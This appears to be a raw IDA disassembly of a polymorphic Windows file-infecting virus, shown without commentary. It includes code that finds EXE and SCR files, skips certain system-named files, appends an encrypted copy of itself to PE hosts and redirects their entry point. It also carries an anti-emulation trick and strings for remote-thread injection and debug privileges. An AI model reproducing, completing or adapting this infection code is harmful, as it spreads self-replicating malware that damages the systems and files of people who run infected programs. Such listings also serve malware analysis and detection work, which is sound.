		jb	short loc_314323C4
		cmp	al, 7Ah
		ja	short loc_314323C4
		sub	al, 20h


loc_314323C4:				; CODE XREF: UPX2:314323BCj
					; UPX2:314323C0j
		stosb
		cmp	al, 5Ch
		jz	short loc_314323B5
		cmp	al, 2Eh
		jz	short loc_314323AA
		cmp	al, 0
		jnz	short loc_314323B9
		jecxz	short locret_3143239C
		mov	eax, [ecx]
		cmp	eax, 455845h
		jz	short loc_314323E7
		cmp	eax, 524353h
		jnz	locret_3143231A


loc_314323E7:				; CODE XREF: UPX2:314323DAj
		mov	eax, [ebx]
		cmp	eax, 434E4957h
		jz	locret_3143231A
		cmp	eax, 4E554357h
		jz	locret_3143231A
		cmp	eax, 32334357h
		jz	locret_3143231A
		cmp	eax, 4F545350h
		jz	locret_3143231A
		xor	ebx, ebx
		call	sub_31432249
		jnz	short loc_3143242E
		call	sub_3143211D
		call	sub_31432249
		jz	locret_3143231A


loc_3143242E:				; CODE XREF: UPX2:3143241Cj
		xor	edx, edx
		call	sub_3143244B
		call	sub_3143239D
		call	$+5
		pop	ebp
		sub	ebp, 10343Fh
		jmp	loc_31432845

; =============== S U B	R O U T	I N E =======================================



sub_3143244B	proc near		; CODE XREF: UPX2:31432430p

var_14		= dword	ptr -14h

		push	dword ptr fs:[edx]
		mov	esi, [ebp+1042A4h]
		mov	fs:[edx], esp
		cmp	word ptr [esi],	5A4Dh
		jnz	loc_31432845
		mov	ebx, [esi+3Ch]
		add	ebx, esi
		cmp	word ptr [ebx],	4550h
		jnz	loc_31432845
		test	dword ptr [ebx+16h], 2000h
		jnz	loc_31432845
		test	byte ptr [ebx+5Ch], 2
		jz	loc_31432845
		mov	eax, [ebx+8]
		cmp	eax, 0A0A0A0A0h
		jz	loc_31432845
		cmp	eax, 20202020h
		jz	loc_31432845
		mov	ecx, [ebx+0C8h]
		jecxz	short loc_314324C0
		push	ecx
		call	sub_31431404
		add	ecx, [ebp+1042E8h]
		add	ecx, esi
		and	dword ptr [ecx+40h], 0
		and	dword ptr [ecx+44h], 0


loc_314324C0:				; CODE XREF: sub_3143244B+5Dj
		call	sub_31432360
		jb	loc_31432845
		and	dword ptr [ebp+1042ECh], 0
		mov	eax, [edx+8]
		mov	ecx, [edx+10h]
		sub	eax, ecx
		jnb	short loc_314324E0
		xor	eax, eax
		jmp	short loc_314324E5
; ---------------------------------------------------------------------------


loc_314324E0:				; CODE XREF: sub_3143244B+8Fj
		add	ecx, eax
		mov	[edx+10h], ecx


loc_314324E5:				; CODE XREF: sub_3143244B+93j
		mov	[ebp+1042ACh], eax
		add	ecx, [edx+0Ch]
		mov	eax, 10000h
		push	ecx
		call	near ptr dword_31430B40+43h
		xor	[ebp+1039AEh], dl
		mov	cl, 20h
		xor	[ebp+1039AFh], dh


loc_31432507:				; CODE XREF: sub_3143244B+D5j
		push	20h
		dec	cl
		pop	eax
		js	short loc_31432522
		call	near ptr dword_31430B40+43h
		test	edx, edx
		setz	dl
		shl	edx, cl
		xor	[ebp+1039B0h], edx
		jmp	short loc_31432507
; ---------------------------------------------------------------------------


loc_31432522:				; CODE XREF: sub_3143244B+C1j
		test	dword ptr [ebp+1039B0h], 2000000h
		jz	short loc_31432550
		test	dword ptr [ebp+1039B0h], 3
		jnz	short loc_31432546
		and	dword ptr [ebp+1039B0h], 0F7FFFFFFh
		jmp	short loc_31432550
; ---------------------------------------------------------------------------


loc_31432546:				; CODE XREF: sub_3143244B+EDj
		or	dword ptr [ebp+1039B0h], 10000000h


loc_31432550:				; CODE XREF: sub_3143244B+E1j
					; sub_3143244B+F9j ...
		push	6
		pop	ecx


loc_31432556:				; CODE XREF: sub_3143244B+129j
		push	6
		pop	eax
		call	near ptr dword_31430B40+43h
		mov	al, [ebp+1039A8h]
		xchg	al, [edx+ebp+1039A8h]
		mov	[ebp+1039A8h], al
		loop	loc_31432556
		test	dword ptr [ebp+1039B0h], 8
		jnz	short loc_3143258B
		cmp	byte ptr [ebp+1039AAh],	1
		jz	short loc_31432550


loc_3143258B:				; CODE XREF: sub_3143244B+135j
		test	dword ptr [ebp+1039B0h], 10000000h
		jz	short loc_314325B2
		cmp	byte ptr [ebp+1039A8h],	5
		jz	short loc_31432550
		cmp	byte ptr [ebp+1039A9h],	5
		jz	short loc_31432550
		cmp	byte ptr [ebp+1039AAh],	5
		jz	short loc_31432550


loc_314325B2:				; CODE XREF: sub_3143244B+14Aj
		test	dword ptr [ebp+1039B0h], 400000h
		jz	short loc_314325C7
		cmp	byte ptr [ebp+1039A8h],	2
		ja	short loc_31432550


loc_314325C7:				; CODE XREF: sub_3143244B+171j
		and	dword ptr [ebp+1042F0h], 0
		call	loc_31431845
		call	loc_3143231B
		call	sub_3143284E
		mov	ebx, [ebp+1042A8h]
		add	ebx, [ebp+1042ACh]
		call	sub_31432249
		jz	loc_31432845
		mov	esi, [ebp+1042A4h]
		mov	ebx, [esi+3Ch]
		add	ebx, esi
		call	sub_31432360
		jb	loc_31432845
		or	dword ptr [edx+24h], 0E0000060h
		mov	edi, esi
		push	edx
		push	esi
		add	edi, [edx+14h]
		add	edi, [edx+10h]
		test	dword ptr [ebp+1039B0h], 20000000h
		jnz	short loc_3143263B
		mov	[ebp+1042F4h], edi
		lea	esi, [ebp+1039BCh]
		mov	ecx, [ebp+101069h]
		rep movsb


loc_3143263B:				; CODE XREF: sub_3143244B+1DAj
		push	edi
		mov	ecx, 0A6Fh
		lea	esi, [ebp+101000h]
		rep movsd
		mov	cl, 0
		jecxz	short loc_3143264F
		rep movsb


loc_3143264F:				; CODE XREF: sub_3143244B+200j
		test	dword ptr [ebp+1039B0h], 20000000h
		jz	loc_3143270D
		push	dword ptr [ebx+28h]
		call	sub_31431404
		mov	edx, [ebp+1042E4h]
		test	edx, edx
		jz	loc_3143270D
		mov	esi, [ebp+1042A4h]
		mov	ecx, [edx+10h]
		or	dword ptr [edx+24h], 0E0000060h
		sub	ecx, [edx+8]
		jnb	short loc_3143268C
		xor	ecx, ecx


loc_3143268C:				; CODE XREF: sub_3143244B+23Dj
		add	esi, [edx+14h]
		cmp	ecx, [ebp+101069h]
		mov	ecx, [ebp+101069h]
		jb	short loc_314326F3
		mov	edi, [esp+14h+var_14]
		and	dword ptr [ebp+101069h], 0
		and	dword ptr [edi+69h], 0
		mov	edi, [edx+8]
		add	[edx+8], ecx
		add	esi, edi
		xchg	esi, edi
		mov	eax, [ebp+1042B8h]
		test	dword ptr [ebp+1039B0h], 40h
		jz	short loc_314326CC
		neg	dword ptr [eax]


loc_314326CC:				; CODE XREF: sub_3143244B+27Dj
		add	esi, [edx+0Ch]
		sub	[eax], esi
		mov	[ebp+1042F0h], esi
		mov	esi, [ebx+28h]
		add	[eax], esi
		test	dword ptr [ebp+1039B0h], 40h
		jz	short loc_314326EA
		neg	dword ptr [eax]


loc_314326EA:				; CODE XREF: sub_3143244B+29Bj
		push	ecx
		call	loc_3143231B
		pop	ecx
		jmp	short loc_314326FF
; ---------------------------------------------------------------------------


loc_314326F3:				; CODE XREF: sub_3143244B+250j
		add	esi, [ebx+28h]
		sub	esi, [edx+0Ch]
		push	ecx
		push	esi
		rep movsb
		pop	edi
		pop	ecx


loc_314326FF:				; CODE XREF: sub_3143244B+2A6j
		lea	esi, [ebp+1039BCh]
		mov	[ebp+1042F4h], edi
		rep movsb


loc_3143270D:				; CODE XREF: sub_3143244B+20Ej
					; sub_3143244B+224j
		pop	edi
		pop	esi
		rdtsc
		xchg	eax, edx
		lea	eax, [edi+137h]
		cmp	dl, [ebp+1039AEh]
		jnz	short loc_31432726
		imul	edx, 12345678h


loc_31432726:				; CODE XREF: sub_3143244B+2D3j
		mov	[eax-19h], dx
		call	sub_31430120
		pop	edx
		mov	ecx, [edx+0Ch]
		add	ecx, [edx+10h]
		test	dword ptr [ebp+1039B0h], 20000000h
		lea	eax, [ecx+5]
		jnz	short loc_31432758
		mov	[ebp+1042F0h], ecx
		add	eax, [ebp+101069h]
		and	dword ptr [edi+69h], 0


loc_31432758:				; CODE XREF: sub_3143244B+2F8j
		sub	eax, [ebx+28h]
		mov	[edi+54h], eax
		test	dword ptr [ebp+103F6Ch], 1
		jz	short loc_31432774
		mov	dword ptr [ebx+8], 0A0A0A0A0h


loc_31432774:				; CODE XREF: sub_3143244B+320j
		test	dword ptr [ebp+1039B0h], 400000h
		jz	short loc_31432787
		push	edx
		call	sub_31431EE1
		pop	edx


loc_31432787:				; CODE XREF: sub_3143244B+333j
		mov	ecx, [ebp+1042F0h]
		jecxz	short loc_31432794
		mov	[ebx+28h], ecx
		jmp	short loc_314327A1
; ---------------------------------------------------------------------------


loc_31432794:				; CODE XREF: sub_3143244B+342j
		mov	ecx, [ebp+1042ECh]
		jecxz	short loc_3143279E
		jmp	short loc_314327A1
; ---------------------------------------------------------------------------


loc_3143279E:				; CODE XREF: sub_3143244B+34Fj
		mov	ecx, [ebx+28h]


loc_314327A1:				; CODE XREF: sub_3143244B+347j
					; sub_3143244B+351j
		test	dword ptr [ebp+1039B0h], 3
		jz	short loc_314327C1
		mov	eax, [ebp+1042F4h]
		add	ecx, [ebp+1042DCh]
		add	eax, [ebp+1042D8h]
		add	[eax], ecx


loc_314327C1:				; CODE XREF: sub_3143244B+360j
		mov	ecx, [edx+10h]
		mov	eax, [ebp+1042A8h]
		cmp	[edx+8], ecx
		jnb	short loc_314327D2
		mov	[edx+8], ecx


loc_314327D2:				; CODE XREF: sub_3143244B+382j
		add	[edx+10h], eax
		and	dword ptr [ebx+58h], 0
		mov	eax, [ebp+1042B0h]
		push	29BCh
		add	[edx+8], eax
		pop	ecx
		add	[ebx+50h], eax
		mov	dl, [ebp+1039AEh]
		test	dword ptr [ebp+1039B0h], 20000000h
		jz	short loc_31432803
		add	ecx, [ebp+101069h]


loc_31432803:				; CODE XREF: sub_3143244B+3B0j
		mov	dh, 0
		test	dword ptr [ebp+1039B0h], 20000h
		jnz	short loc_31432825
		inc	dh
		test	dword ptr [ebp+1039B0h], 40000h
		jnz	short loc_31432825
		mov	dh, [ebp+1039AFh]


loc_31432825:				; CODE XREF: sub_3143244B+3C4j
					; sub_3143244B+3D2j
		test	dword ptr [ebp+1039B0h], 4000h
		jnz	short loc_3143283C


loc_31432831:				; CODE XREF: sub_3143244B+3EDj
		mov	al, [edi]
		add	al, dl
		stosb
		add	dl, dh
		loop	loc_31432831
		jmp	short loc_31432845
; ---------------------------------------------------------------------------


loc_3143283C:				; CODE XREF: sub_3143244B+3E4j
					; sub_3143244B+3F8j
		mov	al, [edi]
		xor	al, dl
		stosb
		add	dl, dh
		loop	loc_3143283C


loc_31432845:				; CODE XREF: UPX2:31432446j
					; sub_3143244B+11j ...
		xor	edx, edx
		mov	esp, fs:[edx]
		pop	dword ptr fs:[edx]
		pop	eax
sub_3143244B	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_3143284E	proc near		; CODE XREF: sub_3143244B+18Dp
		cmp	dword ptr [ebp+104288h], 0
		jz	locret_3143231A
		push	dword ptr [ebp+1042A4h]
		call	dword ptr [ebp+103EDEh]


loc_31432867:				; CODE XREF: sub_31432249+C5j
		push	dword ptr [ebp+1042A0h]
		call	dword ptr [ebp+103E52h]
		lea	ecx, [ebp+10428Ch]
		lea	edx, [ebp+104294h]
		push	ecx
		push	edx
		push	0
		push	dword ptr [ebp+104288h]
		call	dword ptr [ebp+103ED2h]


loc_3143288F:				; CODE XREF: sub_31432249+6Bj
					; sub_31432249+82j ...
		push	dword ptr [ebp+104288h]
		call	dword ptr [ebp+103E52h]


loc_3143289B:				; CODE XREF: sub_31432249+45j
		lea	esi, [ebp+104174h]
		push	dword ptr [ebp+104284h]
		push	esi
		call	dword ptr [ebp+103ECEh]
		and	dword ptr [ebp+104288h], 0
		retn
sub_3143284E	endp

; ---------------------------------------------------------------------------
		dw 0E8h
		dd 5D000000h, 0ED81016Ah, 1038BBh, 0C10FF058h, 10157885h
		dd 0C3C08500h, 0F0FFC883h, 7885C10Fh, 0C3001015h, 2A00103Dh
		dd 661C7500h, 0C247C81h, 1375716Ch, 0FFC4E860h,	575FFFFh
		dd 0FFFAB5E8h, 0FFD2E8FFh, 2E61FFFFh, 56782DFFh, 25B81234h
		dd 60000000h, 0FFFFA5E8h, 8B3975FFh, 8D302444h,	104174B5h
		dd 8508B00h, 63A8166h, 56257302h, 0FF000068h, 6AC48B00h
		dd 0FF505200h, 103F1E95h, 8C48300h, 3F5C3E81h, 3755C3Fh
		dd 0E804C683h, 0FFFFFA62h, 0FFFF7FE8h, 0B8C361FFh, 74h
		dd 2FB8B1EBh, 0E8000000h, 1Dh, 0B80020C2h, 30h,	10E8h
		dd 24C200h, 185B8h, 3E800h, 2CC20000h, 24548D00h, 832ECD0Ch
		dd 197C00F8h, 0E860h, 548B0000h, 8B5D3024h, 92ED811Ah
		dd 0E8001039h, 0FFFFE0B3h, 4C261h, 7010206h, 14E60503h
		dd 0F62F543Ch, 119415FFh, 0FF8B0100h, 27E890h, 0B9530000h
		dd 0CBFh, 3166DA8Bh, 13148D10h,	408DD686h, 5BF3E202h, 0E3C35DC3h
		dd 0C3310F3Eh, 1000B8h,	0EBC93300h, 75C08525h, 852CCD08h
		dd 0EBED79C0h, 0CA8C660Eh, 780AE3C1h, 38E173E3h, 0E8DD74FEh
		dd 0FFFFFFD5h, 0FFCFE891h, 0D9F7FFFFh, 8BC10355h, 8104246Ch
		dd 604246Ch, 2D00001Eh,	100h, 0ED81B373h, 301006h, 1082858Dh
		dd 8B660030h, 0FFFF9D90h, 0FF84E8FFh, 3E08FFFFh, 68219AF6h
		dd 71270B1Fh, 222FF53Fh, 0B13161D9h, 0E767CF0Ch, 0E2AE6F36h
		dd 17931AB9h, 35EAE7E1h, 0E40EC101h, 0EFE7h, 0FAh dup(0)
		dd 9B470000h, 8AD7C80h,	3317C83h, 7C91h, 126h dup(0)
		dd 98h,	1341h dup(0)
; ---------------------------------------------------------------------------
		call	$+5
		cld
		mov	eax, [esp]
		mov	ecx, [eax+29ABh]
		mov	[eax+32F3h], ebx
		and	ecx, 400000h
		mov	ebx, [esp+4]
		jz	short loc_3143804D
		pop	ecx
		mov	[eax+32F7h], esi
		mov	cl, [eax+29AFh]
		mov	[eax+32FBh], edi
		cmp	cl, 0E8h
		jz	short loc_31438041
		mov	ebx, [eax+29B1h]
		jmp	short loc_3143804B
; ---------------------------------------------------------------------------


loc_31438041:				; CODE XREF: UPX2:31438037j
		mov	ecx, [eax+29B0h]
		mov	ebx, [ecx+ebx+2]


loc_3143804B:				; CODE XREF: UPX2:3143803Fj
		mov	ebx, [ebx]


loc_3143804D:				; CODE XREF: UPX2:3143801Fj
		push	ebp
		mov	ebp, eax
		sub	dword ptr [esp+4], 0E005h
		sub	ebp, 101005h
		mov	edi, [esp+4]
		lea	esi, [ebp+1039BCh]
		mov	ecx, 0AEh
		rep movsb
		sldt	cx
		test	ecx, ecx
		jnz	short loc_3143807B
		or	eax, 0FFFFFFFFh
		int	2Eh		; DOS 2+ internal - EXECUTE COMMAND
					; DS:SI	-> counted CR-terminated command string


loc_3143807B:				; CODE XREF: UPX2:31438074j
		and	ebx, 0FFFFF000h


loc_31438081:				; CODE XREF: UPX2:31438090j
		cmp	dword ptr [ebx+4Eh], 73696854h
		jz	short loc_31438092


loc_3143808A:				; CODE XREF: UPX2:3143809Fj
		sub	ebx, 100h
		jnz	short loc_31438081


loc_31438092:				; CODE XREF: UPX2:31438088j
		mov	eax, ebx
		add	eax, [ebx+3Ch]
		mov	edx, [eax+78h]
		cmp	word ptr [eax],	4550h
		jnz	short loc_3143808A
		add	edx, ebx
		mov	esi, [edx+20h]
		mov	ecx, [edx+18h]
		add	esi, ebx
		push	ecx


loc_314380AC:				; CODE XREF: UPX2:loc_314380C0j
		lodsd
		add	eax, ebx
		cmp	word ptr [eax+2], 5074h
		jnz	short loc_314380C0
		cmp	dword ptr [eax+5], 6441636Fh
		jz	short loc_314380C5


loc_314380C0:				; CODE XREF: UPX2:314380B5j
		loop	loc_314380AC
		pop	ecx
		jmp	short loc_314380F0
; ---------------------------------------------------------------------------


loc_314380C5:				; CODE XREF: UPX2:314380BEj
		sub	[esp], ecx
		mov	esi, [edx+24h]
		pop	ecx
		add	esi, ebx
		movzx	eax, word ptr [esi+ecx*2]
		mov	edi, [edx+1Ch]
		add	edi, ebx
		mov	esi, [edi+eax*4]
		add	esi, ebx
		lea	eax, [ebp+101137h]
		lea	ecx, [ebp+101120h]
		mov	dx, [eax-19h]
		call	ecx
		jmp	short loc_31438137
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_3143817E


loc_314380F0:				; CODE XREF: UPX2:314380C3j
					; sub_3143817E+10j ...
		mov	eax, [ebp+1039B0h]
		and	eax, 400000h
		jz	short loc_3143811C
		lea	esi, [ebp+1039B4h]
		lodsd
		mov	edi, [esp+arg_0]
		stosd
		mov	ebx, [ebp+1042F8h]
		movsb
		mov	edi, [ebp+104300h]
		mov	esi, [ebp+1042FCh]


loc_3143811C:				; CODE XREF: sub_3143817E-83j
		pop	ebp
		retn
; END OF FUNCTION CHUNK	FOR sub_3143817E
; ---------------------------------------------------------------------------
		sub	[edx+53h], bl	; CODE XREF: sub_3143A44B+2DFp
		mov	ecx, 2879h
		mov	ebx, edx


loc_31438128:				; CODE XREF: UPX2:31438133j
		xor	[eax], dl
		sub	dl, bl
		add	eax, 1
		xchg	bl, bh
		xchg	dl, dh
		loop	loc_31438128
		pop	ebx
		retn
; ---------------------------------------------------------------------------


loc_31438137:				; CODE XREF: UPX2:314380EEj
		call	near ptr loc_31438146+2
		inc	ebx
		insb
		outsd
		jnb	short near ptr loc_314381A3+3
		dec	eax
		popa
		outsb
		db	64h
		insb


loc_31438146:				; CODE XREF: UPX2:loc_31438137p
		add	gs:[ebx-1], dl
		setalc
		mov	[ebp+103E52h], eax
		call	near ptr loc_31438162+1
		inc	ebx
		jb	short loc_314381BE
		popa
		jz	short near ptr loc_314381C0+1
		inc	ebp
		jbe	short near ptr loc_314381C0+4
		outsb
		jz	short loc_314381A3


loc_31438162:				; CODE XREF: UPX2:31438151p
		add	[ebx-1], dl
		setalc
		mov	[ebp+103E56h], eax
		call	sub_3143817E
		inc	edi
		db	65h
		jz	short near ptr loc_314381C0+1
		popa
		jnb	short near ptr loc_314381EA+2
		inc	ebp
		jb	short near ptr loc_314381EA+3
		outsd
		jb	short $+2

; =============== S U B	R O U T	I N E =======================================



sub_3143817E	proc near		; CODE XREF: UPX2:3143816Cp

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 314380F0 SIZE 0000002E BYTES
; FUNCTION CHUNK AT 31438524 SIZE 0000000B BYTES

		push	ebx
		call	esi	; lstrcatA
		mov	[ebp+103E5Ah], eax
		call	sub_3143854F
		test	eax, eax
		jz	loc_314380F0
		push	eax
		call	dword ptr [ebp+103E5Ah]
		test	eax, eax
		jnz	loc_31438524


loc_314381A3:				; CODE XREF: UPX2:31438160j
					; UPX2:3143813Fj
		cmp	byte ptr [ebp+10152Fh],	1
		jnz	short loc_314381C0
		push	dword ptr [ebp+1042F8h]
		dec	byte ptr [ebp+10152Fh]
		pop	dword ptr [ebp+101588h]


loc_314381BE:				; CODE XREF: UPX2:31438157j
		jmp	short loc_314381C7
; ---------------------------------------------------------------------------


loc_314381C0:				; CODE XREF: sub_3143817E+2Cj
					; UPX2:3143815Aj ...
		and	dword ptr [ebp+101588h], 0


loc_314381C7:				; CODE XREF: sub_3143817E:loc_314381BEj
		and	dword ptr [ebp+101578h], 0
		and	dword ptr [ebp+10157Ch], 0
		and	dword ptr [ebp+101580h], 0
		push	edi
		mov	byte ptr [ebp+1012D4h],	1
		mov	[ebp+103E5Eh], esi


loc_314381EA:				; CODE XREF: UPX2:31438176j
					; UPX2:31438179j
		lea	esi, [ebp+1015F4h]
		xor	ecx, ecx
		lea	edi, [ebp+103E6Ah]
		mov	cl, 20h
		call	sub_3143858C
		pop	edi
		call	dword ptr [ebp+103EAAh]
		shr	eax, 1Fh
		jz	loc_314382E3
		mov	eax, [edi+14h]
		push	40h
		add	eax, ebx
		push	8001000h
		mov	[ebp+103E62h], eax
		push	7318h
		push	0
		call	dword ptr [ebp+103EE2h]
		test	eax, eax
		jz	loc_31438524
		xchg	eax, edi
		lea	esi, [ebp+101000h]
		mov	ebp, edi
		mov	ecx, 0CC6h
		sub	ebp, 101000h
		lea	edx, [ebp+101254h]
		rep movsd
		jmp	edx
; ---------------------------------------------------------------------------
		sub	esp, 20h
		mov	edi, esp
		push	8
		xor	eax, eax
		pop	ecx
		lea	edx, [ebp+101B3Dh]
		rep stosd
		mov	edi, esp
		mov	[edi+10h], edx
		inc	byte ptr [edi+1Ch]
		push	edi
		push	10003h
		call	dword ptr [ebp+103E62h]
		add	esp, 20h
		test	eax, eax
		jz	loc_31438524
		xchg	eax, edi
		push	0
		push	1
		push	80000400h
		push	10000h
		call	dword ptr [ebp+103E62h]
		test	eax, eax
		jz	loc_31438524
		push	0
		push	eax
		push	40000h
		push	0
		shr	eax, 0Ch
		push	edi
		push	1
		push	eax
		push	10001h
		call	dword ptr [ebp+103E62h]
		push	1000Ah
		call	dword ptr [ebp+103E62h]
		call	loc_314382D3
		jmp	loc_31438524
; ---------------------------------------------------------------------------


loc_314382D3:				; CODE XREF: sub_3143817E+14Bp
					; sub_3143817E+162j
		push	1
		pop	ecx
		jecxz	short locret_314382E2
		push	0Ah
		call	dword ptr [ebp+103ED6h]
		jmp	short loc_314382D3
; ---------------------------------------------------------------------------

locret_314382E2:			; CODE XREF: sub_3143817E+158j
		retn
; ---------------------------------------------------------------------------


loc_314382E3:				; CODE XREF: sub_3143817E+8Bj
		cmp	dword ptr [ebp+103E82h], 0
		jz	loc_31438524
		call	near ptr loc_314382FA+1
		dec	esi
		push	esp
		inc	esp
		dec	esp
		dec	esp


loc_314382FA:				; CODE XREF: sub_3143817E+172p
		add	bh, bh
sub_3143817E	endp ; sp-analysis failed

		xchg	eax, ebp
		sahf
		db	3Eh
		adc	[eax], al
		lea	esi, [ebp+1017CEh]
		xor	ecx, ecx
		lea	edi, [ebp+103EEAh]
		mov	cl, 0Eh
		xchg	eax, ebx
		call	sub_3143858C
		cmp	dword ptr [ebp+103F1Eh], 0
		jz	loc_31438524
		mov	eax, [ebp+103EEEh]
		push	dword ptr [eax+1]
		pop	dword ptr [ebp+103907h]
		mov	eax, [ebp+103F06h]
		push	dword ptr [eax+1]
		pop	dword ptr [ebp+103954h]
		mov	eax, [ebp+103EF2h]
		push	dword ptr [eax+1]
		pop	dword ptr [ebp+10395Bh]
		mov	ecx, [ebp+103EF6h]
		jecxz	short loc_31438373
		push	dword ptr [ecx+1]
		pop	dword ptr [ebp+103968h]
		mov	ecx, [ebp+103EFEh]
		jecxz	short loc_31438373
		push	dword ptr [ecx+1]
		pop	dword ptr [ebp+103975h]


loc_31438373:				; CODE XREF: UPX2:31438357j
					; UPX2:31438368j
		call	sub_31438530
		lea	edi, [ebp+103F74h]
		mov	ecx, edi
		push	0
		neg	cl
		push	dword ptr [eax+4]
		and	ecx, 3
		push	40h
		add	edi, ecx
		push	edi
		push	0
		push	18h
		lea	esi, [ebp+1015DBh]
		mov	ecx, 19h
		lea	eax, ds:0FFFFFFFEh[ecx*2]
		stosw
		lea	eax, ds:0[ecx*2]
		stosw
		lea	eax, [edi+4]
		stosd
		xor	ah, ah
		lea	edx, [ebp+103E20h]


loc_314383BC:				; CODE XREF: UPX2:314383C5j
		lodsb
		mov	[edx], ax
		stosw
		add	edx, 2
		loop	loc_314383BC
		mov	edx, esp
		push	0
		push	7318h
		mov	ecx, esp
		push	0
		mov	eax, esp
		push	0
		push	8000000h
		push	40h
		push	ecx
		push	edx
		push	0Eh
		push	eax
		call	dword ptr [ebp+103EFAh]
		pop	eax
		add	esp, 40h
		push	7318h
		mov	edx, esp
		push	0
		mov	ecx, esp
		push	40h
		push	0
		push	2
		push	edx
		push	0
		push	7318h
		push	0
		push	ecx
		push	0FFFFFFFFh
		push	eax
		call	dword ptr [ebp+103F02h]
		pop	edi
		pop	ecx
		test	edi, edi
		jz	loc_31438524
		lea	esi, [ebp+101000h]
		mov	ecx, 0CC6h
		mov	ebp, edi
		rep movsd
		sub	ebp, 101000h
		lea	eax, [ebp+10143Ah]
		jmp	eax
; ---------------------------------------------------------------------------
		dw 5450h
		dd 0FF6A206Ah, 3F0A95FFh, 0C0850010h, 0E834755Fh, 14Fh
		dd 11E8h, 44655300h, 67756265h,	76697250h, 67656C69h, 0E8570065h
		dd 550h, 4278B5FFh, 95FF0010h, 103E8Eh,	5295FF57h, 6A00103Eh
		dd 0FF026A00h, 103E8295h, 128B900h, 2B970000h, 240C89E1h
		dd 95FF5754h, 103EC6h, 0A583F633h, 103F62h, 0FF575400h
		dd 103ECA95h, 74C08500h, 0FE834666h, 0FFEE7204h, 6A082474h
		dd 0FF2A6A00h, 103EC295h, 74C08500h, 88E893DCh,	33000005h
		dd 3AE391C9h, 3F628539h, 32750010h, 24247C81h, 73727363h
		dd 0C1812874h, 0E9Fh, 56505450h, 53505051h, 3E7A95FFh
		dd 0C0850010h, 0FF0F7459h, 8F082474h, 103F6285h, 0FDC5E800h
		dd 0FF53FFFFh, 103E5295h, 818EEB00h, 128C4h, 95FF5700h
		dd 103E52h
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_3143817E


loc_31438524:				; CODE XREF: sub_3143817E+1Fj
					; sub_3143817E+B2j ...
		call	dword ptr [ebp+103E52h]
		jmp	loc_314380F0
; END OF FUNCTION CHUNK	FOR sub_3143817E
; ---------------------------------------------------------------------------
		align 10h

; =============== S U B	R O U T	I N E =======================================



sub_31438530	proc near		; CODE XREF: UPX2:loc_31438373p
					; sub_3143854F+2p
		pop	edx
		push	0
		push	0
		push	0
		push	0
		push	40001h
		mov	eax, esp
		push	0
		push	eax
		push	0Ch
		mov	eax, esp
		jmp	edx
sub_31438530	endp

; ---------------------------------------------------------------------------
aVx_4_0		db 'Vx_4',0
		db 0

; =============== S U B	R O U T	I N E =======================================



sub_3143854F	proc near		; CODE XREF: sub_3143817E+9p
		xor	ecx, ecx
		call	sub_31438530
		lea	edx, [ebp+101549h]
		push	edx
		push	ecx
		push	ecx
		push	eax
		call	dword ptr [ebp+103E56h]
		add	esp, 20h
		retn
sub_3143854F	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		align 4
		dd 585858h, 3318h, 0E63h, 3 dup(0)
		dd 29B0h, 0

; =============== S U B	R O U T	I N E =======================================



sub_3143858C	proc near		; CODE XREF: sub_3143817E+7Cp
					; UPX2:31438312p ...
		push	ecx
		push	esi
		push	ebx
		call	dword ptr [ebp+103E5Eh]
		stosd
		pop	ecx


loc_31438597:				; CODE XREF: sub_3143858C+Ej
		lodsb
		test	al, al
		jnz	short loc_31438597
		loop	sub_3143858C
		retn
sub_3143858C	endp


; =============== S U B	R O U T	I N E =======================================



sub_3143859F	proc near		; CODE XREF: sub_3143A11D+25p

; FUNCTION CHUNK AT 31438629 SIZE 000003C0 BYTES
; FUNCTION CHUNK AT 314389F9 SIZE 00000027 BYTES

		lea	edx, [ebp+101975h]
		push	edx
		call	dword ptr [ebp+103EB6h]
		mov	[ebp+104278h], eax
		call	near ptr loc_314385CC+1
		dec	esp
		outsd
		outsd
		imul	esi, [ebp+70h],	50h
		jb	short loc_31438629
		jbe	short near ptr loc_31438629+2
		insb
		db	65h, 67h, 65h
		push	esi
		popa
		insb
		jnz	short loc_31438630
		inc	ecx


loc_314385CC:				; CODE XREF: sub_3143859F+13p
		add	[eax-1], dl
sub_3143859F	endp ; sp-analysis failed

		xchg	eax, ebp
		pop	esi
		db	3Eh
		adc	[eax], al
		mov	[ebp+10427Ch], eax
		retn
; ---------------------------------------------------------------------------
		db  5Ch	; \
		db  42h	; B
		db  61h	; a
		db  73h	; s
		db  65h	; e
		db  4Eh	; N
		db  61h	; a
		db  6Dh	; m
		db  65h	; e
		db  64h	; d
		db  4Fh	; O
		db  62h	; b
		db  6Ah	; j
		db  65h	; e
		db  63h	; c
		db  74h	; t
		db  73h	; s
		db  5Ch	; \
		db  56h	; V
		db  74h	; t
		db  53h	; S
		db  65h	; e
		db  63h	; c
		db  74h	; t
		db    0
		db  6Ch	; l
		db  73h	; s
		db  74h	; t
		db  72h	; r
		db  6Ch	; l
		db  65h	; e
		db  6Eh	; n
		db    0
		db  43h	; C
		db  72h	; r
		db  65h	; e
		db  61h	; a
		db  74h	; t
		db  65h	; e
		db  46h	; F
		db  69h	; i
		db  6Ch	; l
		db  65h	; e
		db  41h	; A
		db    0
		db  43h	; C
		db  72h	; r
		db  65h	; e
		db  61h	; a
		db  74h	; t
		db  65h	; e
		db  46h	; F
		db  69h	; i
		db  6Ch	; l
		db  65h	; e
		db  4Dh	; M
		db  61h	; a
		db  70h	; p
		db  70h	; p
		db  69h	; i
		db  6Eh	; n
		db  67h	; g
		db  41h	; A
		db    0
		db  43h	; C
		db  72h	; r
		db  65h	; e
		db  61h	; a
		db  74h	; t
		db  65h	; e
		db  50h	; P
		db  72h	; r
		db  6Fh	; o
		db  63h	; c
		db  65h	; e
		db  73h	; s
		db  73h	; s
		db  41h	; A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_3143859F


loc_31438629:				; CODE XREF: sub_3143859F+1Fj
					; sub_3143859F+21j
		add	[ebx+72h], al
		db	65h
		popa
		jz	short near ptr loc_31438693+2


loc_31438630:				; CODE XREF: sub_3143859F+2Aj
		push	edx
		db	65h
		insd
		outsd
		jz	short loc_3143869B
		push	esp
		push	64616572h
		add	[ebx+72h], al
		db	65h
		popa
		jz	short near ptr loc_314386A6+2
		push	esp
		push	64616572h
		add	[ebx+72h], al
